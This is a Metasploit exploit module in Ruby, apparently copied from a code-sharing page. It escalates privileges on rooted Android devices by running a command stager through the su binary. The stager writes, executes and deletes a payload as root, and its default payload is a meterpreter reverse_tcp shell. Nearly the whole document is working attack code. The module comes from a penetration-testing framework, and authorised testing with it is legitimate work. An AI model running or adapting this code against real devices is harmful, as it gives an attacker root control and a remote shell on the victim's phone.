Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ManualRanking
8

9
  include Msf::Exploit::CmdStager
10
  include Msf::Post::File
11
  include Msf::Post::Android::Priv
12

13
  def initialize(info={})
14
    super( update_info( info, {
15
      'Name'           => "Android 'su' Privilege Escalation",
16
      'Description'    => %q{
17
          This module uses the su binary present on rooted devices to run
18
          a payload as root.
19

20
          A rooted Android device will contain a su binary (often linked with
21
          an application) that allows the user to run commands as root.
22
          This module will use the su binary to execute a command stager
23
          as root. The command stager will write a payload binary to a
24
          temporary directory, make it executable, execute it in the background,
25
          and finally delete the executable.
26

27
          On most devices the su binary will pop-up a prompt on the device
28
          asking the user for permission.
29
      },
30
      'Author'         => 'timwr',
31
      'License'        => MSF_LICENSE,
32
      'DisclosureDate' => '2017-08-31',
33
      'SessionTypes'   => [ 'meterpreter', 'shell' ],
34
      'Platform'       => [ 'android', 'linux' ],
35
      'Arch'           => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
36
      'Targets'        => [
37
        ['aarch64',{'Arch' => ARCH_AARCH64}],
38
        ['armle',  {'Arch' => ARCH_ARMLE}],
39
        ['x86',    {'Arch' => ARCH_X86}],
40
        ['x64',    {'Arch' => ARCH_X64}],
41
        ['mipsle', {'Arch' => ARCH_MIPSLE}]
42
      ],
43
      'DefaultOptions' => {
44
        'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
45
        'WfsDelay' => 5,
46
      },
47
      'DefaultTarget'  => 0,
48
      }
49
    ))
50
    register_options([
51
      OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
52
      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
53
    ])
54
  end
55

56
  def base_dir
57
    datastore['WritableDir'].to_s
58
  end
59

60
  def su_bin
61
    datastore['SU_BINARY'].to_s
62
  end
63

64
  def exploit
65
    if is_root?
66
      fail_with Failure::BadConfig, 'Session already has root privileges'
67
    end
68

69
    linemax = 4088 - su_bin.size
70
    execute_cmdstager({
71
      flavor: :echo,
72
      enc_format: :octal,
73
      prefix: '\\\\0',
74
      temp: base_dir,
75
      linemax: linemax,
76
      background: true,
77
    })
78
  end
79

80
  def execute_command(cmd, opts)
81
    su_cmd = "#{su_bin} -c '#{cmd}'"
82
    cmd_exec(su_cmd)
83
  end
84

85
end
86

87

88